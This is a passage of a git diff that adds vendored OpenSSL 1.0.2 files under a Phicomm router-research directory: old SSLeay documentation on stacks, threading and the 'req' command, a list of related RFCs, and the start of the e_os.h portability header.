+	This function calls 'func' for each element on the stack, passing
+the element as the argument.  sk_free() is then called to free the 'stack'
+structure.
+
+int sk_insert(STACK *sk,char *data,int where);
+	This function inserts 'data' into stack 'sk' at location 'where'.
+If 'where' is larger that the number of elements in the stack, the element
+is put at the end.  This function tends to be used by other 'stack'
+functions.  Returns 0 on failure, otherwise the number of elements in the
+new stack.
+
+char *sk_delete(STACK *st,int loc);
+	Remove the item a location 'loc' from the stack and returns it.
+Returns NULL if the 'loc' is out of range.
+
+char *sk_delete_ptr(STACK *st, char *p);
+	If the data item pointed to by 'p' is in the stack, it is deleted
+from the stack and returned.  NULL is returned if the element is not in the
+stack.
+
+int sk_find(STACK *st,char *data);
+	Returns the location that contains a value that is equal to 
+the 'data' item.  If the comparison function was not set, this function
+does a linear search.  This function actually qsort()s the stack if it is not
+in order and then uses bsearch() to do the initial search.  If the
+search fails,, -1 is returned.  For mutliple items with the same
+value, the index of the first in the array is returned.
+
+int sk_push(STACK *st,char *data);
+	Append 'data' to the stack.  0 is returned if there is a failure
+(due to a malloc failure), else 1.  This is 
+sk_insert(st,data,sk_num(st));
+
+int sk_unshift(STACK *st,char *data);
+	Prepend 'data' to the front (location 0) of the stack.  This is
+sk_insert(st,data,0);
+
+char *sk_shift(STACK *st);
+	Return and delete from the stack the first element in the stack.
+This is sk_delete(st,0);
+
+char *sk_pop(STACK *st);
+	Return and delete the last element on the stack.  This is
+sk_delete(st,sk_num(sk)-1);
+
+void sk_zero(STACK *st);
+	Removes all items from the stack.  It does not 'free'
+pointers but is a quick way to clear a 'stack of references'.
+
+==== threads.doc ========================================================
+
+How to compile SSLeay for multi-threading.
+
+Well basically it is quite simple, set the compiler flags and build.
+I have only really done much testing under Solaris and Windows NT.
+If you library supports localtime_r() and gmtime_r() add,
+-DTHREADS to the makefile parameters.  You can probably survive with out
+this define unless you are going to have multiple threads generating
+certificates at once.  It will not affect the SSL side of things.
+
+The approach I have taken to doing locking is to make the application provide
+callbacks to perform locking and so that the SSLeay library can distinguish
+between threads (for the error state).
+
+To have a look at an example program, 'cd mt; vi mttest.c'.
+To build under solaris, sh solaris.sh, for Windows NT or Windows 95,
+win32.bat
+
+This will build mttest which will fire up 10 threads that talk SSL
+to each other 10 times.
+To enable everything to work, the application needs to call
+
+CRYPTO_set_id_callback(id_function);
+CRYPTO_set_locking_callback(locking_function);
+
+before any multithreading is started.
+id_function does not need to be defined under Windows NT or 95, the
+correct function will be called if it is not.  Under unix, getpid()
+is call if the id_callback is not defined, for Solaris this is wrong
+(since threads id's are not pid's) but under Linux it is correct
+(threads are just processes sharing the data segement).
+
+The locking_callback is used to perform locking by the SSLeay library.
+eg.
+
+void solaris_locking_callback(mode,type,file,line)
+int mode;
+int type;
+char *file;
+int line;
+	{
+	if (mode & CRYPTO_LOCK)
+		mutex_lock(&(lock_cs[type]));
+	else
+		mutex_unlock(&(lock_cs[type]));
+	}
+
+Now in this case I have used mutexes instead of read/write locks, since they
+are faster and there are not many read locks in SSLeay, you may as well
+always use write locks.  file and line are __FILE__ and __LINE__ from
+the compile and can be usefull when debugging.
+
+Now as you can see, 'type' can be one of a range of values, these values are
+defined in crypto/crypto.h
+CRYPTO_get_lock_name(type) will return a text version of what the lock is.
+There are CRYPTO_NUM_LOCKS locks required, so under solaris, the setup
+for multi-threading can be
+
+static mutex_t lock_cs[CRYPTO_NUM_LOCKS];
+
+void thread_setup()
+	{
+	int i;
+
+	for (i=0; i<CRYPTO_NUM_LOCKS; i++)
+		mutex_init(&(lock_cs[i]),USYNC_THREAD,NULL);
+	CRYPTO_set_id_callback((unsigned long (*)())solaris_thread_id);
+	CRYPTO_set_locking_callback((void (*)())solaris_locking_callback);
+	}
+
+As a final note, under Windows NT or Windows 95, you have to be careful
+not to mix the various threaded, unthreaded and debug libraries.
+Normally if they are mixed incorrectly, mttest will crash just after printing
+out some usage statistics at the end.  This is because the
+different system libraries use different malloc routines and if
+data is malloc()ed inside crypt32.dll or ssl32.dll and then free()ed by a
+different library malloc, things get very confused.
+
+The default SSLeay DLL builds use /MD, so if you use this on your
+application, things will work as expected.  If you use /MDd,
+you will probably have to rebuild SSLeay using this flag.
+I should modify util/mk1mf.pl so it does all this correctly, but 
+this has not been done yet.
+
+One last warning.  Because locking overheads are actually quite large, the
+statistics collected against the SSL_CTX for successfull connections etc
+are not locked when updated.  This does make it possible for these
+values to be slightly lower than they should be, if you are
+running multithreaded on a multi-processor box, but this does not really
+matter much.
+
+
+==== txt_db.doc ========================================================
+
+TXT_DB, a simple text based in memory database.
+
+It holds rows of ascii data, for which the only special character is '\0'.
+The rows can be of an unlimited length.
+
+==== why.doc ========================================================
+
+This file is more of a note for other people who wish to understand why
+the build environment is the way it is :-).
+
+The include files 'depend' as follows.
+Each of 
+crypto/*/*.c includes crypto/cryptlib.h
+ssl/*.c include ssl/ssl_locl.h
+apps/*.c include apps/apps.h
+crypto/cryptlib.h, ssl/ssl_locl.h and apps/apps.h
+all include e_os.h which contains OS/environment specific information.
+If you need to add something todo with a particular environment,
+add it to this file.  It is worth remembering that quite a few libraries,
+like lhash, des, md, sha etc etc do not include crypto/cryptlib.h.  This
+is because these libraries should be 'independantly compilable' and so I
+try to keep them this way.
+e_os.h is not so much a part of SSLeay, as the placing in one spot all the
+evil OS dependant muck.
+
+I wanted to automate as many things as possible.  This includes
+error number generation.  A
+make errors
+will scan the source files for error codes, append them to the correct
+header files, and generate the functions to print the text version
+of the error numbers.  So don't even think about adding error numbers by
+hand, put them in the form
+XXXerr(XXXX_F_XXXX,YYYY_R_YYYY);
+on line and it will be automatically picked up my a make errors.
+
+In a similar vein, programs to be added into ssleay in the apps directory
+just need to have an entry added to E_EXE in makefile.ssl and
+everthing will work as expected.  Don't edit progs.h by hand.
+
+make links re-generates the symbolic links that are used.  The reason why
+I keep everything in its own directory, and don't put all the
+test programs and header files in 'test' and 'include' is because I want
+to keep the 'sub-libraries' independant.  I still 'pull' out
+indervidual libraries for use in specific projects where the code is
+required.  I have used the 'lhash' library in just about every software
+project I have worked on :-).
+
+make depend generates dependancies and
+make dclean removes them.
+
+You will notice that I use perl quite a bit when I could be using 'sed'.
+The reason I decided to do this was to just stick to one 'extra' program.
+For Windows NT, I have perl and no sed.
+
+The util/mk1mf.pl program can be used to generate a single makefile.
+I use this because makefiles under Microsoft are horrific.
+Each C compiler seems to have different linker formats, which have
+to be used because the retarted C compilers explode when you do
+cl -o file *.o.
+
+Now some would argue that I should just use the single makefile.  I don't
+like it during develoment for 2 reasons.  First, the actuall make
+command takes a long time.  For my current setup, if I'm in
+crypto/bn and I type make, only the crypto/bn directory gets rebuilt,
+which is nice when you are modifying prototypes in bn.h which
+half the SSLeay depends on.  The second is that to add a new souce file
+I just plonk it in at the required spot in the local makefile.  This
+then alows me to keep things local, I don't need to modify a 'global'
+tables (the make for unix, the make for NT, the make for w31...).
+When I am ripping apart a library structure, it is nice to only
+have to worry about one directory :-).
+
+Having said all this, for the hell of it I put together 2 files that
+#include all the souce code (generated by doing a ls */*.o after a build).
+crypto.c takes only 30 seconds to build under NT and 2 minutes under linux
+for my pentium100.  Much faster that the normal build :-).
+Again, the problem is that when using libraries, every program linked
+to libcrypto.a would suddenly get 330k of library when it may only need
+1k.  This technique does look like a nice way to do shared libraries though.
+
+Oh yes, as a final note, to 'build' a distribution, I just type
+make dist.
+This cleans and packages everything.  The directory needs to be called
+SSLeay since the make does a 'cd ..' and renames and tars things up.
+
+==== req.1 ========================================================
+
+The 'req' command is used to manipulate and deal with pkcs#10
+certificate requests.
+
+It's default mode of operation is to load a certificate and then
+write it out again.
+
+By default the 'req' is read from stdin in 'PEM' format.
+The -inform option can be used to specify 'pem' format or 'der'
+format.  PEM format is the base64 encoding of the DER format.
+
+By default 'req' then writes the request back out. -outform can be used
+to indicate the desired output format, be it 'pem' or 'der'.
+
+To specify an input file, use the '-in' option and the '-out' option
+can be used to specify the output file.
+
+If you wish to perform a command and not output the certificate
+request afterwards, use the '-noout' option.
+
+When a certificate is loaded, it can be printed in a human readable
+ascii format via the '-text' option.
+
+To check that the signature on a certificate request is correct, use
+the '-verify' option to make sure that the private key contained in the
+certificate request corresponds to the signature.
+
+Besides the default mode, there is also the 'generate a certificate
+request' mode.  There are several flags that trigger this mode.
+
+-new will generate a new RSA key (if required) and then prompts
+the user for details for the certificate request.
+-newkey has an argument that is the number of bits to make the new
+key.  This function also triggers '-new'.
+
+The '-new' option can have a key to use specified instead of having to
+load one, '-key' is used to specify the file containg the key.
+-keyform can be used to specify the format of the key.  Only
+'pem' and 'der' formats are supported, later, 'netscape' format may be added.
+
+Finally there is the '-x509' options which makes req output a self
+signed x509 certificate instead of a certificate request.
+
+Now as you may have noticed, there are lots of default options that
+cannot be specified via the command line.  They are held in a 'template'
+or 'configuration file'.  The -config option specifies which configuration
+file to use.  See conf.doc for details on the syntax of this file.
+
+The req command uses the 'req' section of the config file.
+
+---
+# The following variables are defined.  For this example I will populate
+# the various values
+[ req ]
+default_bits	= 512		# default number of bits to use.
+default_keyfile	= testkey.pem	# Where to write the generated keyfile
+				# if not specified.
+distinguished_name= req_dn	# The section that contains the
+				# information about which 'object' we
+				# want to put in the DN.
+attributes	= req_attr	# The objects we want for the
+				# attributes field.
+encrypt_rsa_key	= no		# Should we encrypt newly generated
+				# keys.  I strongly recommend 'yes'.
+
+# The distinguished name section.  For the following entries, the
+# object names must exist in the SSLeay header file objects.h.  If they
+# do not, they will be silently ignored.  The entries have the following
+# format.
+# <object_name>		=> string to prompt with
+# <object_name>_default	=> default value for people
+# <object_name>_value	=> Automatically use this value for this field.
+# <object_name>_min	=> minimum number of characters for data (def. 0)
+# <object_name>_max	=> maximum number of characters for data (def. inf.)
+# All of these entries are optional except for the first one.
+[ req_dn ]
+countryName			= Country Name (2 letter code)
+countryName_default		= AU
+
+stateOrProvinceName		= State or Province Name (full name)
+stateOrProvinceName_default	= Queensland
+
+localityName			= Locality Name (eg, city)
+
+organizationName		= Organization Name (eg, company)
+organizationName_default	= Mincom Pty Ltd
+
+organizationalUnitName		= Organizational Unit Name (eg, section)
+organizationalUnitName_default	= MTR
+
+commonName			= Common Name (eg, YOUR name)
+commonName_max			= 64
+
+emailAddress			= Email Address
+emailAddress_max		= 40
+
+# The next section is the attributes section.  This is exactly the
+# same as for the previous section except that the resulting objects are
+# put in the attributes field. 
+[ req_attr ]
+challengePassword		= A challenge password
+challengePassword_min		= 4
+challengePassword_max		= 20
+
+unstructuredName		= An optional company name
+
+----
+Also note that the order that attributes appear in this file is the
+order they will be put into the distinguished name.
+
+Once this request has been generated, it can be sent to a CA for
+certifying.
+
+----
+A few quick examples....
+
+To generate a new request and a new key
+req -new
+
+To generate a new request and a 1058 bit key
+req -newkey 1058
+
+To generate a new request using a pre-existing key
+req -new -key key.pem
+
+To generate a self signed x509 certificate from a certificate
+request using a supplied key, and we want to see the text form of the
+output certificate (which we will put in the file selfSign.pem
+req -x509 -in req.pem -key key.pem -text -out selfSign.pem
+
+Verify that the signature is correct on a certificate request.
+req -verify -in req.pem
+
+Verify that the signature was made using a specified public key.
+req -verify -in req.pem -key key.pem
+
+Print the contents of a certificate request
+req -text -in req.pem
+
+==== danger ========================================================
+
+If you specify a SSLv2 cipher, and the mode is SSLv23 and the server
+can talk SSLv3, it will claim there is no cipher since you should be
+using SSLv3.
+
+When tracing debug stuff, remember BIO_s_socket() is different to
+BIO_s_connect().
+
+BSD/OS assember is not working
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/standards.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/standards.txt
new file mode 100644
index 0000000..7bada8d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/standards.txt
@@ -0,0 +1,285 @@
+Standards related to OpenSSL
+============================
+
+[Please, this is currently a draft.  I made a first try at finding
+ documents that describe parts of what OpenSSL implements.  There are
+ big gaps, and I've most certainly done something wrong.  Please
+ correct whatever is...  Also, this note should be removed when this
+ file is reaching a somewhat correct state.        -- Richard Levitte]
+
+
+All pointers in here will be either URL's or blobs of text borrowed
+from miscellaneous indexes, like rfc-index.txt (index of RFCs),
+1id-index.txt (index of Internet drafts) and the like.
+
+To find the latest possible RFCs, it's recommended to either browse
+ftp://ftp.isi.edu/in-notes/ or go to http://www.rfc-editor.org/ and
+use the search mechanism found there.
+To find the latest possible Internet drafts, it's recommended to
+browse ftp://ftp.isi.edu/internet-drafts/.
+To find the latest possible PKCS, it's recommended to browse
+http://www.rsasecurity.com/rsalabs/pkcs/.
+
+
+Implemented:
+------------
+
+These are documents that describe things that are implemented (in
+whole or at least great parts) in OpenSSL.
+
+1319 The MD2 Message-Digest Algorithm. B. Kaliski. April 1992.
+     (Format: TXT=25661 bytes) (Status: INFORMATIONAL)
+
+1320 The MD4 Message-Digest Algorithm. R. Rivest. April 1992. (Format:
+     TXT=32407 bytes) (Status: INFORMATIONAL)
+
+1321 The MD5 Message-Digest Algorithm. R. Rivest. April 1992. (Format:
+     TXT=35222 bytes) (Status: INFORMATIONAL)
+
+2246 The TLS Protocol Version 1.0. T. Dierks, C. Allen. January 1999.
+     (Format: TXT=170401 bytes) (Status: PROPOSED STANDARD)
+
+2268 A Description of the RC2(r) Encryption Algorithm. R. Rivest.
+     January 1998. (Format: TXT=19048 bytes) (Status: INFORMATIONAL)
+
+2315 PKCS 7: Cryptographic Message Syntax Version 1.5. B. Kaliski.
+     March 1998. (Format: TXT=69679 bytes) (Status: INFORMATIONAL)
+
+PKCS#8: Private-Key Information Syntax Standard
+
+PKCS#12: Personal Information Exchange Syntax Standard, version 1.0.
+
+2560 X.509 Internet Public Key Infrastructure Online Certificate
+     Status Protocol - OCSP. M. Myers, R. Ankney, A. Malpani, S. Galperin,
+     C. Adams. June 1999. (Format: TXT=43243 bytes) (Status: PROPOSED
+     STANDARD)
+
+2712 Addition of Kerberos Cipher Suites to Transport Layer Security
+     (TLS). A. Medvinsky, M. Hur. October 1999. (Format: TXT=13763 bytes)
+     (Status: PROPOSED STANDARD)
+
+2898 PKCS #5: Password-Based Cryptography Specification Version 2.0.
+     B. Kaliski. September 2000. (Format: TXT=68692 bytes) (Status:
+     INFORMATIONAL)
+
+2986 PKCS #10: Certification Request Syntax Specification Version 1.7.
+     M. Nystrom, B. Kaliski. November 2000. (Format: TXT=27794 bytes)
+     (Obsoletes RFC2314) (Status: INFORMATIONAL)
+
+3174 US Secure Hash Algorithm 1 (SHA1). D. Eastlake 3rd, P. Jones.
+     September 2001. (Format: TXT=35525 bytes) (Status: INFORMATIONAL)
+
+3161 Internet X.509 Public Key Infrastructure, Time-Stamp Protocol (TSP)
+     C. Adams, P. Cain, D. Pinkas, R. Zuccherato. August 2001
+     (Status: PROPOSED STANDARD)
+
+3268 Advanced Encryption Standard (AES) Ciphersuites for Transport
+     Layer Security (TLS). P. Chown. June 2002. (Format: TXT=13530 bytes)
+     (Status: PROPOSED STANDARD)
+
+3279 Algorithms and Identifiers for the Internet X.509 Public Key
+     Infrastructure Certificate and Certificate Revocation List (CRL)
+     Profile. L. Bassham, W. Polk, R. Housley. April 2002. (Format:
+     TXT=53833 bytes) (Status: PROPOSED STANDARD)
+
+3280 Internet X.509 Public Key Infrastructure Certificate and
+     Certificate Revocation List (CRL) Profile. R. Housley, W. Polk, W.
+     Ford, D. Solo. April 2002. (Format: TXT=295556 bytes) (Obsoletes
+     RFC2459) (Status: PROPOSED STANDARD)
+
+3447 Public-Key Cryptography Standards (PKCS) #1: RSA Cryptography
+     Specifications Version 2.1. J. Jonsson, B. Kaliski. February 2003.
+     (Format: TXT=143173 bytes) (Obsoletes RFC2437) (Status:           
+     INFORMATIONAL)                                         
+
+3713 A Description of the Camellia Encryption Algorithm. M. Matsui,
+     J. Nakajima, S. Moriai. April 2004. (Format: TXT=25031 bytes)
+     (Status: INFORMATIONAL)
+
+3820 Internet X.509 Public Key Infrastructure (PKI) Proxy Certificate
+     Profile. S. Tuecke, V. Welch, D. Engert, L. Pearlman, M. Thompson.
+     June 2004. (Format: TXT=86374 bytes) (Status: PROPOSED STANDARD)
+
+4132 Addition of Camellia Cipher Suites to Transport Layer Security
+     (TLS). S. Moriai, A. Kato, M. Kanda. July 2005. (Format: TXT=13590
+     bytes) (Status: PROPOSED STANDARD)
+
+4162 Addition of SEED Cipher Suites to Transport Layer Security (TLS).
+     H.J. Lee, J.H. Yoon, J.I. Lee. August 2005. (Format: TXT=10578 bytes)
+     (Status: PROPOSED STANDARD)
+
+4269 The SEED Encryption Algorithm. H.J. Lee, S.J. Lee, J.H. Yoon,
+     D.H. Cheon, J.I. Lee. December 2005. (Format: TXT=34390 bytes)
+     (Obsoletes RFC4009) (Status: INFORMATIONAL)
+
+
+Related:
+--------
+
+These are documents that are close to OpenSSL, for example the
+STARTTLS documents.
+
+1421 Privacy Enhancement for Internet Electronic Mail: Part I: Message
+     Encryption and Authentication Procedures. J. Linn. February 1993.
+     (Format: TXT=103894 bytes) (Obsoletes RFC1113) (Status: PROPOSED
+     STANDARD)
+
+1422 Privacy Enhancement for Internet Electronic Mail: Part II:
+     Certificate-Based Key Management. S. Kent. February 1993. (Format:
+     TXT=86085 bytes) (Obsoletes RFC1114) (Status: PROPOSED STANDARD)
+
+1423 Privacy Enhancement for Internet Electronic Mail: Part III:
+     Algorithms, Modes, and Identifiers. D. Balenson. February 1993.
+     (Format: TXT=33277 bytes) (Obsoletes RFC1115) (Status: PROPOSED
+     STANDARD)
+
+1424 Privacy Enhancement for Internet Electronic Mail: Part IV: Key
+     Certification and Related Services. B. Kaliski. February 1993.
+     (Format: TXT=17537 bytes) (Status: PROPOSED STANDARD)
+
+2025 The Simple Public-Key GSS-API Mechanism (SPKM). C. Adams. October
+     1996. (Format: TXT=101692 bytes) (Status: PROPOSED STANDARD)
+
+2510 Internet X.509 Public Key Infrastructure Certificate Management
+     Protocols. C. Adams, S. Farrell. March 1999. (Format: TXT=158178
+     bytes) (Status: PROPOSED STANDARD)
+
+2511 Internet X.509 Certificate Request Message Format. M. Myers, C.
+     Adams, D. Solo, D. Kemp. March 1999. (Format: TXT=48278 bytes)
+     (Status: PROPOSED STANDARD)
+
+2527 Internet X.509 Public Key Infrastructure Certificate Policy and
+     Certification Practices Framework. S. Chokhani, W. Ford. March 1999.
+     (Format: TXT=91860 bytes) (Status: INFORMATIONAL)
+
+2538 Storing Certificates in the Domain Name System (DNS). D. Eastlake
+     3rd, O. Gudmundsson. March 1999. (Format: TXT=19857 bytes) (Status:
+     PROPOSED STANDARD)
+
+2539 Storage of Diffie-Hellman Keys in the Domain Name System (DNS).
+     D. Eastlake 3rd. March 1999. (Format: TXT=21049 bytes) (Status:
+     PROPOSED STANDARD)
+
+2559 Internet X.509 Public Key Infrastructure Operational Protocols -
+     LDAPv2. S. Boeyen, T. Howes, P. Richard. April 1999. (Format:
+     TXT=22889 bytes) (Updates RFC1778) (Status: PROPOSED STANDARD)
+
+2585 Internet X.509 Public Key Infrastructure Operational Protocols:
+     FTP and HTTP. R. Housley, P. Hoffman. May 1999. (Format: TXT=14813
+     bytes) (Status: PROPOSED STANDARD)
+
+2587 Internet X.509 Public Key Infrastructure LDAPv2 Schema. S.
+     Boeyen, T. Howes, P. Richard. June 1999. (Format: TXT=15102 bytes)
+     (Status: PROPOSED STANDARD)
+
+2595 Using TLS with IMAP, POP3 and ACAP. C. Newman. June 1999.
+     (Format: TXT=32440 bytes) (Status: PROPOSED STANDARD)
+
+2631 Diffie-Hellman Key Agreement Method. E. Rescorla. June 1999.
+     (Format: TXT=25932 bytes) (Status: PROPOSED STANDARD)
+
+2632 S/MIME Version 3 Certificate Handling. B. Ramsdell, Ed.. June
+     1999. (Format: TXT=27925 bytes) (Status: PROPOSED STANDARD)
+
+2716 PPP EAP TLS Authentication Protocol. B. Aboba, D. Simon. October
+     1999. (Format: TXT=50108 bytes) (Status: EXPERIMENTAL)
+
+2773 Encryption using KEA and SKIPJACK. R. Housley, P. Yee, W. Nace.
+     February 2000. (Format: TXT=20008 bytes) (Updates RFC0959) (Status:
+     EXPERIMENTAL)
+
+2797 Certificate Management Messages over CMS. M. Myers, X. Liu, J.
+     Schaad, J. Weinstein. April 2000. (Format: TXT=103357 bytes) (Status:
+     PROPOSED STANDARD)
+
+2817 Upgrading to TLS Within HTTP/1.1. R. Khare, S. Lawrence. May
+     2000. (Format: TXT=27598 bytes) (Updates RFC2616) (Status: PROPOSED
+     STANDARD)
+
+2818 HTTP Over TLS. E. Rescorla. May 2000. (Format: TXT=15170 bytes)
+     (Status: INFORMATIONAL)
+
+2876 Use of the KEA and SKIPJACK Algorithms in CMS. J. Pawling. July
+     2000. (Format: TXT=29265 bytes) (Status: INFORMATIONAL)
+
+2984 Use of the CAST-128 Encryption Algorithm in CMS. C. Adams.
+     October 2000. (Format: TXT=11591 bytes) (Status: PROPOSED STANDARD)
+
+2985 PKCS #9: Selected Object Classes and Attribute Types Version 2.0.
+     M. Nystrom, B. Kaliski. November 2000. (Format: TXT=70703 bytes)
+     (Status: INFORMATIONAL)
+
+3029 Internet X.509 Public Key Infrastructure Data Validation and
+     Certification Server Protocols. C. Adams, P. Sylvester, M. Zolotarev,
+     R. Zuccherato. February 2001. (Format: TXT=107347 bytes) (Status:
+     EXPERIMENTAL)
+
+3039 Internet X.509 Public Key Infrastructure Qualified Certificates
+     Profile. S. Santesson, W. Polk, P. Barzin, M. Nystrom. January 2001.
+     (Format: TXT=67619 bytes) (Status: PROPOSED STANDARD)
+
+3058 Use of the IDEA Encryption Algorithm in CMS. S. Teiwes, P.
+     Hartmann, D. Kuenzi. February 2001. (Format: TXT=17257 bytes)
+     (Status: INFORMATIONAL)
+
+3161 Internet X.509 Public Key Infrastructure Time-Stamp Protocol
+     (TSP). C. Adams, P. Cain, D. Pinkas, R. Zuccherato. August 2001.
+     (Format: TXT=54585 bytes) (Status: PROPOSED STANDARD)
+
+3185 Reuse of CMS Content Encryption Keys. S. Farrell, S. Turner.
+     October 2001. (Format: TXT=20404 bytes) (Status: PROPOSED STANDARD)
+
+3207 SMTP Service Extension for Secure SMTP over Transport Layer
+     Security. P. Hoffman. February 2002. (Format: TXT=18679 bytes)
+     (Obsoletes RFC2487) (Status: PROPOSED STANDARD)
+
+3217 Triple-DES and RC2 Key Wrapping. R. Housley. December 2001.
+     (Format: TXT=19855 bytes) (Status: INFORMATIONAL)
+
+3274 Compressed Data Content Type for Cryptographic Message Syntax
+     (CMS). P. Gutmann. June 2002. (Format: TXT=11276 bytes) (Status:
+     PROPOSED STANDARD)
+
+3278 Use of Elliptic Curve Cryptography (ECC) Algorithms in
+     Cryptographic Message Syntax (CMS). S. Blake-Wilson, D. Brown, P.
+     Lambert. April 2002. (Format: TXT=33779 bytes) (Status:
+     INFORMATIONAL)
+
+3281 An Internet Attribute Certificate Profile for Authorization. S.
+     Farrell, R. Housley. April 2002. (Format: TXT=90580 bytes) (Status:
+     PROPOSED STANDARD)
+
+3369 Cryptographic Message Syntax (CMS). R. Housley. August 2002.
+     (Format: TXT=113975 bytes) (Obsoletes RFC2630, RFC3211) (Status:
+     PROPOSED STANDARD)
+
+3370 Cryptographic Message Syntax (CMS) Algorithms. R. Housley. August
+     2002. (Format: TXT=51001 bytes) (Obsoletes RFC2630, RFC3211) (Status:
+     PROPOSED STANDARD)
+
+3377 Lightweight Directory Access Protocol (v3): Technical
+     Specification. J. Hodges, R. Morgan. September 2002. (Format:
+     TXT=9981 bytes) (Updates RFC2251, RFC2252, RFC2253, RFC2254, RFC2255,
+     RFC2256, RFC2829, RFC2830) (Status: PROPOSED STANDARD)
+
+3394 Advanced Encryption Standard (AES) Key Wrap Algorithm. J. Schaad,
+     R. Housley. September 2002. (Format: TXT=73072 bytes) (Status:
+     INFORMATIONAL)
+
+3436 Transport Layer Security over Stream Control Transmission
+     Protocol. A. Jungmaier, E. Rescorla, M. Tuexen. December 2002.
+     (Format: TXT=16333 bytes) (Status: PROPOSED STANDARD)
+
+3657 Use of the Camellia Encryption Algorithm in Cryptographic 
+     Message Syntax (CMS). S. Moriai, A. Kato. January 2004.
+     (Format: TXT=26282 bytes) (Status: PROPOSED STANDARD)
+
+"Securing FTP with TLS", 01/27/2000, <draft-murray-auth-ftp-ssl-05.txt>  
+ 
+
+To be implemented:
+------------------
+
+These are documents that describe things that are planed to be
+implemented in the hopefully short future.
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/e_os.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/e_os.h
new file mode 100644
index 0000000..45fef69
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/e_os.h
@@ -0,0 +1,782 @@
+/* e_os.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_E_OS_H
+# define HEADER_E_OS_H
+
+# include <openssl/opensslconf.h>
+
+# include <openssl/e_os2.h>
+/*
+ * <openssl/e_os2.h> contains what we can justify to make visible to the
+ * outside; this file e_os.h is not part of the exported interface.
+ */
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Used to checking reference counts, most while doing perl5 stuff :-) */
+# ifdef REF_PRINT
+#  undef REF_PRINT
+#  define REF_PRINT(a,b)  fprintf(stderr,"%08X:%4d:%s\n",(int)b,b->references,a)
+# endif
+
+# ifndef DEVRANDOM
+/*
+ * set this to a comma-separated list of 'random' device files to try out. My
+ * default, we will try to read at least one of these files
+ */
+#  define DEVRANDOM "/dev/urandom","/dev/random","/dev/srandom"
+# endif
+# ifndef DEVRANDOM_EGD
+/*
+ * set this to a comma-seperated list of 'egd' sockets to try out. These
+ * sockets will be tried in the order listed in case accessing the device
+ * files listed in DEVRANDOM did not return enough entropy.
+ */
+#  define DEVRANDOM_EGD "/var/run/egd-pool","/dev/egd-pool","/etc/egd-pool","/etc/entropy"
+# endif
+
+# if defined(OPENSSL_SYS_VXWORKS)
+#  define NO_SYS_PARAM_H
+#  define NO_CHMOD
+#  define NO_SYSLOG
+# endif
+
+# if defined(OPENSSL_SYS_MACINTOSH_CLASSIC)
+#  if macintosh==1
+#   ifndef MAC_OS_GUSI_SOURCE
+#    define MAC_OS_pre_X
+#    define NO_SYS_TYPES_H
+#   endif
+#   define NO_SYS_PARAM_H
+#   define NO_CHMOD
+#   define NO_SYSLOG
+#   undef  DEVRANDOM
+#   define GETPID_IS_MEANINGLESS
+#  endif
+# endif
+
+/********************************************************************
+ The Microsoft section
+ ********************************************************************/
+/*
+ * The following is used because of the small stack in some Microsoft
+ * operating systems
+ */
+# if defined(OPENSSL_SYS_MSDOS) && !defined(OPENSSL_SYSNAME_WIN32)
+#  define MS_STATIC     static
+# else
+#  define MS_STATIC
+# endif
+
+# if defined(OPENSSL_SYS_WIN32) && !defined(WIN32)
+#  define WIN32
+# endif
+# if defined(OPENSSL_SYS_WINDOWS) && !defined(WINDOWS)
